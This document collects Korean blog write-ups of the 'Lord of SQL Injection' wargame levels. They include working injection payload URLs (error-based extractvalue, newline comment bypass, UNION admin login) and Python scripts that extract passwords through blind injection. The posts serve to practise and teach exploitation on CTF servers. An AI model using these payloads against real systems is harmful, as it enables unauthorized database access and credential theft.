http://leaveret.kr/los/hell_fire_309d5f471fbdd4722d221835380bb805.php?limit=1%20procedure%20analyse(extractvalue(1,concat(0,(select%20pw%20from%20probhellfire%20limit%201))),1)%23


limit 뒤에는 사용할 수 있는 함수가 제한적이다 

procedure analyse()가 사용가능함으로 extractvalue라는 함수를 이용해서 풀음

왠 러시아 형님 블로그가서 찾음 ㅋㅋㅋㅋㅋ


문자열의 길이가 엄청 길기 때문에 여러번 해야 한다.

http://los.sandbox.cash/chall/hell_fire_caa31470fa3ada0e8f6bf78cd5730eee.php?limit=2%20procedure%20analyse(extractvalue(0,concat(0x0a,(select%20substr(pw,79)%20from%20probhellfire%20limit%201))),1)%23


저기 중간 값을 바꿔가면서 풀면 된다.


wwwwwwwwwwoooooowwwwwwwwwwwGodYouNiceHackerrrrrrrrkkkkkkkkkkkkYouDidThisShitLOLLLLLLLLLLLLLLLLLLLLLLL

'War Game > LOS' 카테고리의 다른 글

LOS Evil_Wizard  (0) 2015.08.16
LOS NightMare  (0) 2015.08.16
LOS Xavis  (0) 2015.08.16
LOS Iron_Golem  (0) 2015.08.16
LOS Dragon  (0) 2015.08.16

http://los.sandbox.cash/chall/xavis_a395c4d30bdb092b6f835ee7b4821aa3.php?pw=%ED%95%B4%EC%BB%A4%EB%8B%A4

키값이 한글 아오

한글자씩 비교해서 추출했다 ㅋㅋㅋㅋㅋㅋㅋㅋ손으로


예전엔 손으로 풀었지만 역시나 진우꺼 소스 가져오는게 가장 편하다.



import requests
 
 
 
key=""
site=""
q=0
w=1
header={'Cookie':'PHPSESSID=dtf9l8uj2aq5m3orv1ddmg97k7'}
for j in range(1,4):
        for i in reversed(range(1,17)):
                site="http://los.sandbox.cash/chall/xavis_a395c4d30bdb092b6f835ee7b4821aa3.php?pw=%27||id='admin'%26%26"
                site+="substr(bin(ord(mid(pw,"+str(j)+",1))),"+str(i)+",1)%23"
                print (site)
                r=requests.put(site,headers=header)
                
                if "<br><h2>Hello admin" in r.text:
                  q+=w
                w=w*2
        key=key+str(q)+"   "
        print ("\nkey"+key+"\n")
        q=0
        w=1
                


출처 : http://unknown84.tistory.com/23

'War Game > LOS' 카테고리의 다른 글

LOS NightMare  (0) 2015.08.16
LOS Hell_Fire  (0) 2015.08.16
LOS Iron_Golem  (0) 2015.08.16
LOS Dragon  (0) 2015.08.16
LOS 풀이  (0) 2015.08.16

http://leaveret.kr/los/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw=%27or%20if(substr(lpad(bin(ord(substr(pw,"+str(j)+",1))),16,%270%27),"+str(i)+",1)=1,(select%201%20union%20select%202),0)%23


SubQuery를 이용해 해결하는 문제 기억이 맞다면 키값때문에 굉장히 빡쳤다.

키값이 한글임 아오 


중간에 str(j)랑 str(i)를 바꿔서 공격

http://mwultong.blogspot.com/2008/02/16-2-10-8-hex-calc.html




for j in range(1,23):

        for i in reversed(range(1,17)):

                site="http://los.sandbox.cash/chall/iron_golem_0803cf46da7bda62b328dbfc1d77fe15.php?pw="

                site+="%27or%20if(substr(lpad(bin(ord(substr(pw,"+str(j)+",1))),16,%270%27),"+str(i)+",1)=1,(select%201%20union%20select%202),0)%23"

                print (site)

                r=requests.put(site,headers=header)


                if "Subquery returns more than 1 row" in r.text:

                  q+=w

                w=w*2

        key=key+"   "+str(q)

        print ("\nkey"+key+"\n")

        q=0

        w=1

'War Game > LOS' 카테고리의 다른 글

LOS NightMare  (0) 2015.08.16
LOS Hell_Fire  (0) 2015.08.16
LOS Xavis  (0) 2015.08.16
LOS Dragon  (0) 2015.08.16
LOS 풀이  (0) 2015.08.16

http://leaveret.kr/los/dragon_51996aa769df79afbf79eb4d66dbcef6.php?pw=%27%0A%20or%20id=%27admin%27%23


정확히는 기억안나지만 #은 한줄을 주석처리하는 것이다

이떄 중간에 %0A 개행문자를 넣어서 주석처리를 우회하는 문제로 기억한다. 

url이 달라서 안맞지만 PayLoad는 저거 아마도?


최근 다시 풀어보니 쿼리가 안먹힌다... 뭐지?


http://los.sandbox.cash/chall/dragon_c1577dc8b003a4f163cab14e8d92510b.php?pw=%0Alimit%200%20union%20select%20%27admin

일단 %0a를 이용해 개행문자를 넣어주는 것은 맞다 

%0Alimit 0 union select 'admin


limit 0 해서 결과값이 없게 한다음 union select 'admin 을 넣어주면 된다.

'War Game > LOS' 카테고리의 다른 글

LOS NightMare  (0) 2015.08.16
LOS Hell_Fire  (0) 2015.08.16
LOS Xavis  (0) 2015.08.16
LOS Iron_Golem  (0) 2015.08.16
LOS 풀이  (0) 2015.08.16

Rubiya님이 군대가시는 관계로 서버를 이전한 LOS

http://los.sandbox.cash


Lord Of SQL Injection


난빨라(stypr)님이 운영하시는 LOS



'War Game > LOS' 카테고리의 다른 글

LOS NightMare  (0) 2015.08.16
LOS Hell_Fire  (0) 2015.08.16
LOS Xavis  (0) 2015.08.16
LOS Iron_Golem  (0) 2015.08.16
LOS Dragon  (0) 2015.08.16

+ Recent posts

티스토리툴바